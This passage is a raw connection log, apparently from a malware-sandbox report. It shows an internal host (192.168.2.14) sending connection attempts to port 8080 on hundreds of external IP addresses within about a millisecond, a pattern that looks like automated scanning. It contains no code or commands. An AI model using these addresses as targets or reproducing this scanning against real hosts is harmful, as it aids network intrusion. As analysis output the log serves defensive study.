                                              Nov 23, 2023 05:14:51.040894985 CET478168080192.168.2.1431.117.174.111
                                              Nov 23, 2023 05:14:51.040894985 CET478168080192.168.2.1485.176.134.254
                                              Nov 23, 2023 05:14:51.040894985 CET478168080192.168.2.1485.198.7.67
                                              Nov 23, 2023 05:14:51.040894985 CET478168080192.168.2.1495.113.228.65
                                              Nov 23, 2023 05:14:51.040931940 CET478168080192.168.2.1495.22.156.204
                                              Nov 23, 2023 05:14:51.040931940 CET478168080192.168.2.1431.187.104.102
                                              Nov 23, 2023 05:14:51.040931940 CET478168080192.168.2.1485.238.40.89
                                              Nov 23, 2023 05:14:51.040935040 CET478168080192.168.2.1495.242.33.113
                                              Nov 23, 2023 05:14:51.040935993 CET478168080192.168.2.1462.212.252.114
                                              Nov 23, 2023 05:14:51.040935040 CET478168080192.168.2.1495.159.115.212
                                              Nov 23, 2023 05:14:51.040935993 CET478168080192.168.2.1462.106.64.246
                                              Nov 23, 2023 05:14:51.040935040 CET478168080192.168.2.1431.134.50.101
                                              Nov 23, 2023 05:14:51.040935993 CET478168080192.168.2.1485.34.100.30
                                              Nov 23, 2023 05:14:51.040935993 CET478168080192.168.2.1485.246.108.254
                                              Nov 23, 2023 05:14:51.040937901 CET478168080192.168.2.1494.26.236.55
                                              Nov 23, 2023 05:14:51.040935993 CET478168080192.168.2.1462.7.193.132
                                              Nov 23, 2023 05:14:51.040937901 CET478168080192.168.2.1495.215.205.84
                                              Nov 23, 2023 05:14:51.040941954 CET478168080192.168.2.1462.109.116.191
                                              Nov 23, 2023 05:14:51.040944099 CET478168080192.168.2.1494.217.194.206
                                              Nov 23, 2023 05:14:51.040937901 CET478168080192.168.2.1495.181.33.162
                                              Nov 23, 2023 05:14:51.040944099 CET478168080192.168.2.1494.241.132.162
                                              Nov 23, 2023 05:14:51.040935040 CET478168080192.168.2.1494.109.167.94
                                              Nov 23, 2023 05:14:51.040944099 CET478168080192.168.2.1462.33.65.218
                                              Nov 23, 2023 05:14:51.040941954 CET478168080192.168.2.1495.115.61.131
                                              Nov 23, 2023 05:14:51.040935993 CET478168080192.168.2.1462.143.38.150
                                              Nov 23, 2023 05:14:51.040944099 CET478168080192.168.2.1485.47.109.38
                                              Nov 23, 2023 05:14:51.040941954 CET478168080192.168.2.1431.204.101.46
                                              Nov 23, 2023 05:14:51.040944099 CET478168080192.168.2.1485.5.175.217
                                              Nov 23, 2023 05:14:51.040949106 CET478168080192.168.2.1431.243.74.37
                                              Nov 23, 2023 05:14:51.040941954 CET478168080192.168.2.1494.17.88.31
                                              Nov 23, 2023 05:14:51.040949106 CET478168080192.168.2.1485.34.199.9
                                              Nov 23, 2023 05:14:51.040941954 CET478168080192.168.2.1462.86.6.230
                                              Nov 23, 2023 05:14:51.040949106 CET478168080192.168.2.1485.3.180.60
                                              Nov 23, 2023 05:14:51.040949106 CET478168080192.168.2.1494.204.53.138
                                              Nov 23, 2023 05:14:51.040949106 CET478168080192.168.2.1494.81.151.162
                                              Nov 23, 2023 05:14:51.040935040 CET478168080192.168.2.1485.42.230.180
                                              Nov 23, 2023 05:14:51.041100025 CET478168080192.168.2.1462.242.245.103
                                              Nov 23, 2023 05:14:51.041100025 CET478168080192.168.2.1485.249.70.77
                                              Nov 23, 2023 05:14:51.041100025 CET478168080192.168.2.1485.108.206.182
                                              Nov 23, 2023 05:14:51.041100025 CET478168080192.168.2.1431.139.250.128
                                              Nov 23, 2023 05:14:51.041100025 CET478168080192.168.2.1485.74.198.214
                                              Nov 23, 2023 05:14:51.041100979 CET478168080192.168.2.1431.29.225.247
                                              Nov 23, 2023 05:14:51.041100025 CET478168080192.168.2.1485.249.65.72
                                              Nov 23, 2023 05:14:51.041100979 CET478168080192.168.2.1495.21.62.204
                                              Nov 23, 2023 05:14:51.041100025 CET478168080192.168.2.1495.62.142.255
                                              Nov 23, 2023 05:14:51.041105986 CET478168080192.168.2.1485.180.199.73
                                              Nov 23, 2023 05:14:51.041101933 CET478168080192.168.2.1462.174.139.160
                                              Nov 23, 2023 05:14:51.041105032 CET478168080192.168.2.1495.59.2.110
                                              Nov 23, 2023 05:14:51.041101933 CET478168080192.168.2.1494.26.93.114
                                              Nov 23, 2023 05:14:51.041105032 CET478168080192.168.2.1462.90.202.196
                                              Nov 23, 2023 05:14:51.041106939 CET478168080192.168.2.1495.41.44.202
                                              Nov 23, 2023 05:14:51.041105986 CET478168080192.168.2.1495.141.180.31
                                              Nov 23, 2023 05:14:51.041107893 CET478168080192.168.2.1431.63.47.17
                                              Nov 23, 2023 05:14:51.041101933 CET478168080192.168.2.1494.203.196.169
                                              Nov 23, 2023 05:14:51.041105986 CET478168080192.168.2.1431.237.44.28
                                              Nov 23, 2023 05:14:51.041101933 CET478168080192.168.2.1485.236.244.87
                                              Nov 23, 2023 05:14:51.041105986 CET478168080192.168.2.1431.110.0.32
                                              Nov 23, 2023 05:14:51.041106939 CET478168080192.168.2.1431.167.34.211
                                              Nov 23, 2023 05:14:51.041105986 CET478168080192.168.2.1495.81.243.145
                                              Nov 23, 2023 05:14:51.041105032 CET478168080192.168.2.1494.129.181.210
                                              Nov 23, 2023 05:14:51.041106939 CET478168080192.168.2.1431.171.132.253
                                              Nov 23, 2023 05:14:51.041105986 CET478168080192.168.2.1431.135.196.53
                                              Nov 23, 2023 05:14:51.041106939 CET478168080192.168.2.1485.16.26.43
                                              Nov 23, 2023 05:14:51.041101933 CET478168080192.168.2.1462.40.102.22
                                              Nov 23, 2023 05:14:51.041107893 CET478168080192.168.2.1431.192.208.220
                                              Nov 23, 2023 05:14:51.041105032 CET478168080192.168.2.1495.7.13.117
                                              Nov 23, 2023 05:14:51.041101933 CET478168080192.168.2.1431.167.79.75
                                              Nov 23, 2023 05:14:51.041107893 CET478168080192.168.2.1462.121.183.49
                                              Nov 23, 2023 05:14:51.041105986 CET478168080192.168.2.1462.232.57.221
                                              Nov 23, 2023 05:14:51.041107893 CET478168080192.168.2.1431.53.107.195
                                              Nov 23, 2023 05:14:51.041106939 CET478168080192.168.2.1485.48.144.97
                                              Nov 23, 2023 05:14:51.041107893 CET478168080192.168.2.1495.116.52.236
                                              Nov 23, 2023 05:14:51.041105032 CET478168080192.168.2.1462.71.130.234
                                              Nov 23, 2023 05:14:51.041105986 CET478168080192.168.2.1431.139.154.248
                                              Nov 23, 2023 05:14:51.041102886 CET478168080192.168.2.1431.95.100.168
                                              Nov 23, 2023 05:14:51.041105032 CET478168080192.168.2.1494.172.200.183
                                              Nov 23, 2023 05:14:51.041107893 CET478168080192.168.2.1485.72.253.149
                                              Nov 23, 2023 05:14:51.041105986 CET478168080192.168.2.1494.194.139.127
                                              Nov 23, 2023 05:14:51.041106939 CET478168080192.168.2.1494.37.88.115
                                              Nov 23, 2023 05:14:51.041105986 CET478168080192.168.2.1485.169.129.139
                                              Nov 23, 2023 05:14:51.041105032 CET478168080192.168.2.1431.208.227.202
                                              Nov 23, 2023 05:14:51.041105986 CET478168080192.168.2.1462.175.183.190
                                              Nov 23, 2023 05:14:51.041105986 CET478168080192.168.2.1462.21.244.186
                                              Nov 23, 2023 05:14:51.041106939 CET478168080192.168.2.1495.217.80.157
                                              Nov 23, 2023 05:14:51.041107893 CET478168080192.168.2.1494.138.46.159
                                              Nov 23, 2023 05:14:51.041106939 CET478168080192.168.2.1462.147.10.46
                                              Nov 23, 2023 05:14:51.041105032 CET478168080192.168.2.1431.153.3.39
                                              Nov 23, 2023 05:14:51.041107893 CET478168080192.168.2.1494.151.33.119
                                              Nov 23, 2023 05:14:51.041105986 CET478168080192.168.2.1494.139.146.231
                                              Nov 23, 2023 05:14:51.041105986 CET478168080192.168.2.1495.98.134.157
                                              Nov 23, 2023 05:14:51.041105986 CET478168080192.168.2.1431.122.17.51
                                              Nov 23, 2023 05:14:51.041105986 CET478168080192.168.2.1494.175.39.50
                                              Nov 23, 2023 05:14:51.041189909 CET478168080192.168.2.1495.238.130.80
                                              Nov 23, 2023 05:14:51.041189909 CET478168080192.168.2.1431.84.100.135
                                              Nov 23, 2023 05:14:51.041191101 CET478168080192.168.2.1494.84.253.192
                                              Nov 23, 2023 05:14:51.041191101 CET478168080192.168.2.1431.251.227.86
                                              Nov 23, 2023 05:14:51.041192055 CET478168080192.168.2.1431.25.134.199
                                              Nov 23, 2023 05:14:51.041193008 CET478168080192.168.2.1495.117.161.229
                                              Nov 23, 2023 05:14:51.041193008 CET478168080192.168.2.1431.62.50.196
                                              Nov 23, 2023 05:14:51.041193008 CET478168080192.168.2.1431.196.165.156
                                              Nov 23, 2023 05:14:51.041193008 CET478168080192.168.2.1431.115.0.234
                                              Nov 23, 2023 05:14:51.041193008 CET478168080192.168.2.1462.255.167.49
                                              Nov 23, 2023 05:14:51.041193008 CET478168080192.168.2.1494.208.203.67
                                              Nov 23, 2023 05:14:51.041193008 CET478168080192.168.2.1431.172.144.31
                                              Nov 23, 2023 05:14:51.041198969 CET478168080192.168.2.1462.83.135.235
                                              Nov 23, 2023 05:14:51.041198969 CET478168080192.168.2.1431.96.14.47
                                              Nov 23, 2023 05:14:51.041198969 CET478168080192.168.2.1495.219.159.138
                                              Nov 23, 2023 05:14:51.041198969 CET478168080192.168.2.1485.203.145.53
                                              Nov 23, 2023 05:14:51.041198969 CET478168080192.168.2.1431.150.246.131
                                              Nov 23, 2023 05:14:51.041198969 CET478168080192.168.2.1495.188.245.82
                                              Nov 23, 2023 05:14:51.041199923 CET478168080192.168.2.1462.171.170.114
                                              Nov 23, 2023 05:14:51.041199923 CET478168080192.168.2.1462.140.141.254
                                              Nov 23, 2023 05:14:51.041218042 CET478168080192.168.2.1462.68.53.5
                                              Nov 23, 2023 05:14:51.041218042 CET478168080192.168.2.1431.22.221.253
                                              Nov 23, 2023 05:14:51.041218042 CET478168080192.168.2.1485.8.141.251
                                              Nov 23, 2023 05:14:51.041218042 CET478168080192.168.2.1495.78.239.13
                                              Nov 23, 2023 05:14:51.041218042 CET478168080192.168.2.1462.92.39.134
                                              Nov 23, 2023 05:14:51.041218042 CET478168080192.168.2.1462.14.36.117
                                              Nov 23, 2023 05:14:51.041218042 CET478168080192.168.2.1462.206.93.19
                                              Nov 23, 2023 05:14:51.041218042 CET478168080192.168.2.1462.114.97.108
                                              Nov 23, 2023 05:14:51.041235924 CET478168080192.168.2.1462.41.186.186
                                              Nov 23, 2023 05:14:51.041235924 CET478168080192.168.2.1485.132.86.11
                                              Nov 23, 2023 05:14:51.041235924 CET478168080192.168.2.1495.75.144.129
                                              Nov 23, 2023 05:14:51.041235924 CET478168080192.168.2.1485.79.13.57
                                              Nov 23, 2023 05:14:51.041235924 CET478168080192.168.2.1495.70.126.74
                                              Nov 23, 2023 05:14:51.041235924 CET478168080192.168.2.1462.3.78.142
                                              Nov 23, 2023 05:14:51.041235924 CET478168080192.168.2.1494.82.89.84
                                              Nov 23, 2023 05:14:51.041235924 CET478168080192.168.2.1462.154.231.238
                                              Nov 23, 2023 05:14:51.041254044 CET478168080192.168.2.1431.12.91.10
                                              Nov 23, 2023 05:14:51.041254044 CET478168080192.168.2.1494.4.131.121
                                              Nov 23, 2023 05:14:51.041254044 CET478168080192.168.2.1494.34.134.112
                                              Nov 23, 2023 05:14:51.041254044 CET478168080192.168.2.1462.119.96.99
                                              Nov 23, 2023 05:14:51.041254044 CET478168080192.168.2.1494.118.234.13
                                              Nov 23, 2023 05:14:51.041254044 CET478168080192.168.2.1495.85.77.174
                                              Nov 23, 2023 05:14:51.041254044 CET478168080192.168.2.1462.16.150.197
                                              Nov 23, 2023 05:14:51.041254044 CET478168080192.168.2.1485.191.125.22
                                              Nov 23, 2023 05:14:51.041258097 CET478168080192.168.2.1485.164.182.126
                                              Nov 23, 2023 05:14:51.041258097 CET478168080192.168.2.1485.76.234.242
                                              Nov 23, 2023 05:14:51.041258097 CET478168080192.168.2.1485.206.45.85
                                              Nov 23, 2023 05:14:51.041258097 CET478168080192.168.2.1462.12.255.169
                                              Nov 23, 2023 05:14:51.041258097 CET478168080192.168.2.1495.146.157.57
                                              Nov 23, 2023 05:14:51.041258097 CET478168080192.168.2.1462.41.15.253
                                              Nov 23, 2023 05:14:51.041258097 CET478168080192.168.2.1462.195.152.123
                                              Nov 23, 2023 05:14:51.041258097 CET478168080192.168.2.1495.117.66.0
                                              Nov 23, 2023 05:14:51.041265965 CET478168080192.168.2.1462.80.56.239
                                              Nov 23, 2023 05:14:51.041265965 CET478168080192.168.2.1462.111.173.221
                                              Nov 23, 2023 05:14:51.041266918 CET478168080192.168.2.1494.152.178.156
                                              Nov 23, 2023 05:14:51.041265965 CET478168080192.168.2.1431.91.161.66
                                              Nov 23, 2023 05:14:51.041266918 CET478168080192.168.2.1494.163.169.186
                                              Nov 23, 2023 05:14:51.041265965 CET478168080192.168.2.1431.75.78.220
                                              Nov 23, 2023 05:14:51.041266918 CET478168080192.168.2.1462.142.193.49
                                              Nov 23, 2023 05:14:51.041265965 CET478168080192.168.2.1495.26.181.242
                                              Nov 23, 2023 05:14:51.041266918 CET478168080192.168.2.1431.87.142.36
                                              Nov 23, 2023 05:14:51.041265965 CET478168080192.168.2.1494.235.182.31
                                              Nov 23, 2023 05:14:51.041266918 CET478168080192.168.2.1431.192.42.108
                                              Nov 23, 2023 05:14:51.041265965 CET478168080192.168.2.1495.27.218.22
                                              Nov 23, 2023 05:14:51.041265965 CET478168080192.168.2.1431.145.129.253
                                              Nov 23, 2023 05:14:51.041279078 CET478168080192.168.2.1431.196.247.114
                                              Nov 23, 2023 05:14:51.041279078 CET478168080192.168.2.1494.108.3.66
                                              Nov 23, 2023 05:14:51.041279078 CET478168080192.168.2.1462.32.218.183
                                              Nov 23, 2023 05:14:51.041279078 CET478168080192.168.2.1485.82.164.102
                                              Nov 23, 2023 05:14:51.041279078 CET478168080192.168.2.1462.148.120.198
                                              Nov 23, 2023 05:14:51.041279078 CET478168080192.168.2.1494.40.196.190
                                              Nov 23, 2023 05:14:51.041279078 CET478168080192.168.2.1431.87.233.50
                                              Nov 23, 2023 05:14:51.041279078 CET478168080192.168.2.1494.39.39.238
                                              Nov 23, 2023 05:14:51.041291952 CET478168080192.168.2.1485.218.79.218
                                              Nov 23, 2023 05:14:51.041291952 CET478168080192.168.2.1495.219.57.56
                                              Nov 23, 2023 05:14:51.041291952 CET478168080192.168.2.1431.123.239.30
                                              Nov 23, 2023 05:14:51.041291952 CET478168080192.168.2.1485.43.69.156
                                              Nov 23, 2023 05:14:51.041291952 CET478168080192.168.2.1462.192.21.228
                                              Nov 23, 2023 05:14:51.041291952 CET478168080192.168.2.1485.223.181.54
                                              Nov 23, 2023 05:14:51.041291952 CET478168080192.168.2.1462.81.62.220
                                              Nov 23, 2023 05:14:51.041291952 CET478168080192.168.2.1485.23.48.35
                                              Nov 23, 2023 05:14:51.041322947 CET478168080192.168.2.1485.5.217.27
                                              Nov 23, 2023 05:14:51.041322947 CET478168080192.168.2.1462.203.20.125
                                              Nov 23, 2023 05:14:51.041323900 CET478168080192.168.2.1485.119.180.237
                                              Nov 23, 2023 05:14:51.041323900 CET478168080192.168.2.1495.241.124.154
                                              Nov 23, 2023 05:14:51.041323900 CET478168080192.168.2.1495.55.108.101
                                              Nov 23, 2023 05:14:51.041323900 CET478168080192.168.2.1495.249.9.5
                                              Nov 23, 2023 05:14:51.041331053 CET478168080192.168.2.1494.124.58.131
                                              Nov 23, 2023 05:14:51.041331053 CET478168080192.168.2.1431.122.177.126
                                              Nov 23, 2023 05:14:51.041331053 CET478168080192.168.2.1495.112.98.57
                                              Nov 23, 2023 05:14:51.041331053 CET478168080192.168.2.1494.125.214.246
                                              Nov 23, 2023 05:14:51.041331053 CET478168080192.168.2.1485.126.117.20
                                              Nov 23, 2023 05:14:51.041331053 CET478168080192.168.2.1431.210.169.139
                                              Nov 23, 2023 05:14:51.041331053 CET478168080192.168.2.1494.92.26.94
                                              Nov 23, 2023 05:14:51.041331053 CET478168080192.168.2.1495.162.53.133
                                              Nov 23, 2023 05:14:51.041336060 CET478168080192.168.2.1485.23.156.15
                                              Nov 23, 2023 05:14:51.041336060 CET478168080192.168.2.1431.75.55.138
                                              Nov 23, 2023 05:14:51.041337013 CET478168080192.168.2.1494.227.244.57
                                              Nov 23, 2023 05:14:51.041336060 CET478168080192.168.2.1494.225.210.209
                                              Nov 23, 2023 05:14:51.041337013 CET478168080192.168.2.1485.243.101.202
                                              Nov 23, 2023 05:14:51.041336060 CET478168080192.168.2.1462.214.100.182
                                              Nov 23, 2023 05:14:51.041337013 CET478168080192.168.2.1431.134.143.108
                                              Nov 23, 2023 05:14:51.041336060 CET478168080192.168.2.1485.113.49.151
                                              Nov 23, 2023 05:14:51.041337013 CET478168080192.168.2.1494.50.41.129
                                              Nov 23, 2023 05:14:51.041336060 CET478168080192.168.2.1495.65.142.130
                                              Nov 23, 2023 05:14:51.041337013 CET478168080192.168.2.1431.178.151.228
                                              Nov 23, 2023 05:14:51.041336060 CET478168080192.168.2.1485.139.39.113
                                              Nov 23, 2023 05:14:51.041337967 CET478168080192.168.2.1494.173.135.216
                                              Nov 23, 2023 05:14:51.041336060 CET478168080192.168.2.1495.4.202.200
                                              Nov 23, 2023 05:14:51.041337967 CET478168080192.168.2.1462.188.63.246
                                              Nov 23, 2023 05:14:51.041337967 CET478168080192.168.2.1485.90.113.93
                                              Nov 23, 2023 05:14:51.041353941 CET478168080192.168.2.1495.144.107.109
                                              Nov 23, 2023 05:14:51.041353941 CET478168080192.168.2.1462.249.3.14
                                              Nov 23, 2023 05:14:51.041353941 CET478168080192.168.2.1462.203.99.154
                                              Nov 23, 2023 05:14:51.041353941 CET478168080192.168.2.1431.20.94.172
                                              Nov 23, 2023 05:14:51.041353941 CET478168080192.168.2.1462.229.119.192
                                              Nov 23, 2023 05:14:51.041356087 CET478168080192.168.2.1495.121.161.91
                                              Nov 23, 2023 05:14:51.041353941 CET478168080192.168.2.1485.184.4.199
                                              Nov 23, 2023 05:14:51.041356087 CET478168080192.168.2.1485.35.39.188
                                              Nov 23, 2023 05:14:51.041353941 CET478168080192.168.2.1495.135.158.77
                                              Nov 23, 2023 05:14:51.041356087 CET478168080192.168.2.1485.232.144.88
                                              Nov 23, 2023 05:14:51.041353941 CET478168080192.168.2.1462.51.108.131
                                              Nov 23, 2023 05:14:51.041356087 CET478168080192.168.2.1495.178.59.91
                                              Nov 23, 2023 05:14:51.041356087 CET478168080192.168.2.1462.254.201.63
                                              Nov 23, 2023 05:14:51.041356087 CET478168080192.168.2.1462.69.207.181
                                              Nov 23, 2023 05:14:51.041358948 CET478168080192.168.2.1494.227.247.46
                                              Nov 23, 2023 05:14:51.041356087 CET478168080192.168.2.1494.128.55.109
                                              Nov 23, 2023 05:14:51.041358948 CET478168080192.168.2.1485.171.98.235
                                              Nov 23, 2023 05:14:51.041356087 CET478168080192.168.2.1462.146.238.202
                                              Nov 23, 2023 05:14:51.041358948 CET478168080192.168.2.1485.106.212.176
                                              Nov 23, 2023 05:14:51.041358948 CET478168080192.168.2.1431.82.213.4
                                              Nov 23, 2023 05:14:51.041358948 CET478168080192.168.2.1462.43.161.130
                                              Nov 23, 2023 05:14:51.041358948 CET478168080192.168.2.1485.176.217.147
                                              Nov 23, 2023 05:14:51.041358948 CET478168080192.168.2.1462.106.193.100
                                              Nov 23, 2023 05:14:51.041358948 CET478168080192.168.2.1485.202.9.153
                                              Nov 23, 2023 05:14:51.041373968 CET478168080192.168.2.1462.101.184.20
                                              Nov 23, 2023 05:14:51.041373968 CET478168080192.168.2.1485.113.65.254
                                              Nov 23, 2023 05:14:51.041373968 CET478168080192.168.2.1495.150.243.139
                                              Nov 23, 2023 05:14:51.041373968 CET478168080192.168.2.1462.96.67.135
                                              Nov 23, 2023 05:14:51.041373968 CET478168080192.168.2.1494.0.16.98
                                              Nov 23, 2023 05:14:51.041373968 CET478168080192.168.2.1462.40.47.60
                                              Nov 23, 2023 05:14:51.041373968 CET478168080192.168.2.1494.35.172.163
                                              Nov 23, 2023 05:14:51.041373968 CET478168080192.168.2.1485.121.117.255
                                              Nov 23, 2023 05:14:51.041414022 CET478168080192.168.2.1431.48.101.113
                                              Nov 23, 2023 05:14:51.041414022 CET478168080192.168.2.1485.111.146.165
                                              Nov 23, 2023 05:14:51.041429996 CET478168080192.168.2.1494.42.168.192
                                              Nov 23, 2023 05:14:51.041444063 CET478168080192.168.2.1462.100.52.29
                                              Nov 23, 2023 05:14:51.041445971 CET478168080192.168.2.1485.205.247.199
                                              Nov 23, 2023 05:14:51.041445971 CET478168080192.168.2.1431.132.242.62
                                              Nov 23, 2023 05:14:51.041445971 CET478168080192.168.2.1495.169.246.162
                                              Nov 23, 2023 05:14:51.041445971 CET478168080192.168.2.1431.184.115.221
                                              Nov 23, 2023 05:14:51.041445971 CET478168080192.168.2.1431.182.115.117
                                              Nov 23, 2023 05:14:51.041445971 CET478168080192.168.2.1485.51.198.84
                                              Nov 23, 2023 05:14:51.041445971 CET478168080192.168.2.1495.29.166.94
                                              Nov 23, 2023 05:14:51.041445971 CET478168080192.168.2.1495.64.226.17
                                              Nov 23, 2023 05:14:51.041455030 CET478168080192.168.2.1494.1.193.48
                                              Nov 23, 2023 05:14:51.041455030 CET478168080192.168.2.1485.223.41.198
                                              Nov 23, 2023 05:14:51.041455984 CET478168080192.168.2.1494.249.106.33
                                              Nov 23, 2023 05:14:51.041455984 CET478168080192.168.2.1462.17.185.59
                                              Nov 23, 2023 05:14:51.041455984 CET478168080192.168.2.1462.251.87.56
                                              Nov 23, 2023 05:14:51.041455984 CET478168080192.168.2.1462.44.213.5
                                              Nov 23, 2023 05:14:51.041455984 CET478168080192.168.2.1495.88.248.138
                                              Nov 23, 2023 05:14:51.041455984 CET478168080192.168.2.1431.149.180.146
                                              Nov 23, 2023 05:14:51.041461945 CET478168080192.168.2.1462.252.131.220
                                              Nov 23, 2023 05:14:51.041461945 CET478168080192.168.2.1462.227.126.222
                                              Nov 23, 2023 05:14:51.041461945 CET478168080192.168.2.1462.109.48.21
                                              Nov 23, 2023 05:14:51.041461945 CET478168080192.168.2.1431.253.204.66
                                              Nov 23, 2023 05:14:51.041461945 CET478168080192.168.2.1494.2.248.211
                                              Nov 23, 2023 05:14:51.041461945 CET478168080192.168.2.1494.209.177.2
                                              Nov 23, 2023 05:14:51.041461945 CET478168080192.168.2.1495.87.180.177
                                              Nov 23, 2023 05:14:51.041461945 CET478168080192.168.2.1495.86.203.252
                                              Nov 23, 2023 05:14:51.041472912 CET478168080192.168.2.1485.172.96.166
                                              Nov 23, 2023 05:14:51.041474104 CET478168080192.168.2.1485.3.210.223
                                              Nov 23, 2023 05:14:51.041474104 CET478168080192.168.2.1431.252.71.91
                                              Nov 23, 2023 05:14:51.041474104 CET478168080192.168.2.1495.227.213.111
                                              Nov 23, 2023 05:14:51.041474104 CET478168080192.168.2.1494.90.67.97
                                              Nov 23, 2023 05:14:51.041474104 CET478168080192.168.2.1431.137.187.161
                                              Nov 23, 2023 05:14:51.041474104 CET478168080192.168.2.1495.100.72.178
                                              Nov 23, 2023 05:14:51.041474104 CET478168080192.168.2.1431.46.88.7
                                              Nov 23, 2023 05:14:51.041476965 CET478168080192.168.2.1462.131.244.121
                                              Nov 23, 2023 05:14:51.041476965 CET478168080192.168.2.1494.193.171.123
                                              Nov 23, 2023 05:14:51.041476965 CET478168080192.168.2.1495.74.212.79
                                              Nov 23, 2023 05:14:51.041476965 CET478168080192.168.2.1495.186.239.38
                                              Nov 23, 2023 05:14:51.041476965 CET478168080192.168.2.1462.144.89.90
                                              Nov 23, 2023 05:14:51.041476965 CET478168080192.168.2.1494.6.148.121
                                              Nov 23, 2023 05:14:51.041477919 CET478168080192.168.2.1462.93.102.100
                                              Nov 23, 2023 05:14:51.041476965 CET478168080192.168.2.1431.251.83.108
                                              Nov 23, 2023 05:14:51.041477919 CET478168080192.168.2.1485.134.27.7
                                              Nov 23, 2023 05:14:51.041476965 CET478168080192.168.2.1494.147.38.46
                                              Nov 23, 2023 05:14:51.041477919 CET478168080192.168.2.1485.63.17.24
                                              Nov 23, 2023 05:14:51.041477919 CET478168080192.168.2.1494.106.158.29
                                              Nov 23, 2023 05:14:51.041477919 CET478168080192.168.2.1495.186.151.111
                                              Nov 23, 2023 05:14:51.041477919 CET478168080192.168.2.1485.157.69.51
                                              Nov 23, 2023 05:14:51.041511059 CET478168080192.168.2.1495.19.121.70
                                              Nov 23, 2023 05:14:51.041558027 CET478168080192.168.2.1495.73.68.134
                                              Nov 23, 2023 05:14:51.041558027 CET478168080192.168.2.1431.49.52.170
                                              Nov 23, 2023 05:14:51.041565895 CET478168080192.168.2.1495.39.238.132
                                              Nov 23, 2023 05:14:51.041565895 CET478168080192.168.2.1495.130.117.157
                                              Nov 23, 2023 05:14:51.041565895 CET478168080192.168.2.1485.104.82.228
                                              Nov 23, 2023 05:14:51.041565895 CET478168080192.168.2.1494.132.132.60
                                              Nov 23, 2023 05:14:51.041565895 CET478168080192.168.2.1462.56.202.60
                                              Nov 23, 2023 05:14:51.041565895 CET478168080192.168.2.1431.223.15.100
                                              Nov 23, 2023 05:14:51.041565895 CET478168080192.168.2.1494.23.41.184
                                              Nov 23, 2023 05:14:51.041565895 CET478168080192.168.2.1431.119.136.71
                                              Nov 23, 2023 05:14:51.041568041 CET478168080192.168.2.1462.14.46.129
                                              Nov 23, 2023 05:14:51.041568041 CET478168080192.168.2.1495.11.212.19
                                              Nov 23, 2023 05:14:51.041568041 CET478168080192.168.2.1494.218.81.117
                                              Nov 23, 2023 05:14:51.041568041 CET478168080192.168.2.1495.0.155.132
                                              Nov 23, 2023 05:14:51.041568041 CET478168080192.168.2.1462.197.43.141
                                              Nov 23, 2023 05:14:51.041568041 CET478168080192.168.2.1494.10.123.134
                                              Nov 23, 2023 05:14:51.041568041 CET478168080192.168.2.1431.77.69.0
                                              Nov 23, 2023 05:14:51.041568041 CET478168080192.168.2.1494.5.197.250
                                              Nov 23, 2023 05:14:51.041575909 CET478168080192.168.2.1431.98.101.83
                                              Nov 23, 2023 05:14:51.041575909 CET478168080192.168.2.1485.141.27.83
                                              Nov 23, 2023 05:14:51.041575909 CET478168080192.168.2.1431.111.61.255
                                              Nov 23, 2023 05:14:51.041575909 CET478168080192.168.2.1495.182.24.16
                                              Nov 23, 2023 05:14:51.041575909 CET478168080192.168.2.1495.51.241.87
                                              Nov 23, 2023 05:14:51.041575909 CET478168080192.168.2.1431.94.99.191
                                              Nov 23, 2023 05:14:51.041575909 CET478168080192.168.2.1495.139.77.191
                                              Nov 23, 2023 05:14:51.041575909 CET478168080192.168.2.1485.209.9.252
                                              Nov 23, 2023 05:14:51.041578054 CET478168080192.168.2.1462.177.147.128
                                              Nov 23, 2023 05:14:51.041579008 CET478168080192.168.2.1462.15.197.161
                                              Nov 23, 2023 05:14:51.041579008 CET478168080192.168.2.1462.144.198.159
                                              Nov 23, 2023 05:14:51.041579008 CET478168080192.168.2.1494.231.101.133
                                              Nov 23, 2023 05:14:51.041579008 CET478168080192.168.2.1431.141.65.15
                                              Nov 23, 2023 05:14:51.041579008 CET478168080192.168.2.1495.86.28.35
                                              Nov 23, 2023 05:14:51.041579008 CET478168080192.168.2.1462.120.167.34
                                              Nov 23, 2023 05:14:51.041579008 CET478168080192.168.2.1494.89.114.99
                                              Nov 23, 2023 05:14:51.041579008 CET478168080192.168.2.1431.157.117.188
                                              Nov 23, 2023 05:14:51.041585922 CET478168080192.168.2.1495.62.31.171
                                              Nov 23, 2023 05:14:51.041585922 CET478168080192.168.2.1462.200.96.193
                                              Nov 23, 2023 05:14:51.041585922 CET478168080192.168.2.1431.15.179.6
                                              Nov 23, 2023 05:14:51.041599989 CET478168080192.168.2.1495.71.86.148
                                              Nov 23, 2023 05:14:51.041599989 CET478168080192.168.2.1431.107.102.62
                                              Nov 23, 2023 05:14:51.041599989 CET478168080192.168.2.1431.110.196.99
                                              Nov 23, 2023 05:14:51.041599989 CET478168080192.168.2.1485.173.110.230
                                              Nov 23, 2023 05:14:51.041599989 CET478168080192.168.2.1431.35.143.246
                                              Nov 23, 2023 05:14:51.041599989 CET478168080192.168.2.1431.208.149.164
                                              Nov 23, 2023 05:14:51.041599989 CET478168080192.168.2.1494.197.108.77
                                              Nov 23, 2023 05:14:51.041599989 CET478168080192.168.2.1495.22.9.157
                                              Nov 23, 2023 05:14:51.041615009 CET478168080192.168.2.1494.224.44.54
                                              Nov 23, 2023 05:14:51.041615009 CET478168080192.168.2.1494.64.141.204
                                              Nov 23, 2023 05:14:51.041615009 CET478168080192.168.2.1462.186.4.117
                                              Nov 23, 2023 05:14:51.041646957 CET478168080192.168.2.1462.90.56.8
                                              Nov 23, 2023 05:14:51.041646957 CET478168080192.168.2.1485.37.91.58
                                              Nov 23, 2023 05:14:51.041647911 CET478168080192.168.2.1485.136.225.106
                                              Nov 23, 2023 05:14:51.041650057 CET478168080192.168.2.1485.135.223.254
                                              Nov 23, 2023 05:14:51.041650057 CET478168080192.168.2.1462.90.151.117
                                              Nov 23, 2023 05:14:51.041650057 CET478168080192.168.2.1485.25.67.139
                                              Nov 23, 2023 05:14:51.041651011 CET478168080192.168.2.1485.97.184.4
                                              Nov 23, 2023 05:14:51.041661978 CET478168080192.168.2.1431.84.71.35
                                              Nov 23, 2023 05:14:51.041661978 CET478168080192.168.2.1462.151.174.81
                                              Nov 23, 2023 05:14:51.041676044 CET478168080192.168.2.1494.140.31.157
                                              Nov 23, 2023 05:14:51.041676998 CET478168080192.168.2.1431.66.251.209
                                              Nov 23, 2023 05:14:51.041676998 CET478168080192.168.2.1485.249.143.96
                                              Nov 23, 2023 05:14:51.041677952 CET478168080192.168.2.1462.83.88.210
